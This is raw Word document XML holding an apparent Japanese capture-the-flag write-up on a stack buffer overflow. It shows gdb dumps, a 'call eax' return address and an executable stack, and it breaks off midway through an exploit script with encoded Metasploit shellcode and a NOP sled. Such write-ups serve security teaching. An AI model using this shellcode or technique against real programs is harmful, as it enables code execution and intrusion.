                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</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0xbfcfc3dc:</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</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0xbfcfc3ec:</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</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0xbfcfc3fc:</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>0x41414141</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>オーバーフローした時、</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>レジスタがコピー先の先頭を指している</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>よって、</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>call eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を呼び出せば、処理をコピー先の先頭へ持っていける</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRDefault="00AA5FD6" w:rsidP="00FF3A35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2103" type="#_x0000_t202" style="width:399.85pt;height:27.35pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2103" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>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(gdb) x/4i 0x080484df</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0x80484df &lt;frame_dummy+31&gt;:</w:t>
                  </w:r>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:tab/>
                    <w:t>call   *%eax</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>コードの中に</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>call eax</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を見つけた</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>よって、</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>EIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>0x80484df</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>にすれば、コピー先の先頭以降を実行できる</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>easy</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>をバックグラウンドで実行して、メモリマップを確認する</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00AA5FD6" w:rsidP="00FF3A35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2102" type="#_x0000_t202" style="width:399.85pt;height:103.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2102" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>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 ./easy &amp;</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Input: [1] 19990</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pP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[1]+  Stopped                 ./easy</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 ps -aef | grep easy</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Temp    19990 19935  0 00:26 pts/1    00:00:00 ./easy</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 cat /proc/19990/maps | grep stack</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bf801000-bf816000 rwxp bffeb000 00:00 0          [stack]</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>のメモリアクセス権限が</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>rwxp</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>となっているため、</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>領域は、「実行」「読み込み」「書き込み」のすべて行える。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRPr="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>から</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>`cat flag.txt`</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を実行する</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF3A35">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>を持ってくる</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRDefault="00FF3A35" w:rsidP="00FF3A35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF3A35" w:rsidRDefault="00AA5FD6" w:rsidP="00FF3A35">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2101" type="#_x0000_t202" style="width:399.85pt;height:349.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2101" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>-----  exp.py</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>#!/usr/bin/python</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>import sys</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>## execute 'cat KEY'</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell  = "\x33\xc9\x83\xe9\xf5\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x1d\xaf\xf1\x8b\x83\xee\xfc\xe2\xf4\x77\xa4\xa9\x12\x4f\xc9"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x99\xa6\x7e\x26\x16\xe3\x32\xdc\x99\x8b\x75\x80\x93\xe2\x73"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x26\x12\xd9\xf5\xa7\xf1\x8b\x1d\xcc\x90\xff\x3d\xe4\xb4\xd2"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x1d\xf8\xa2\x02\xfc\x62\x71\x8b"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C00B86">
                    <w:rPr>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>shell += "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C00B86" w:rsidRDefault="008A4C86" w:rsidP="00FF3A35">
                  <w:pPr>
                    <w:rPr>
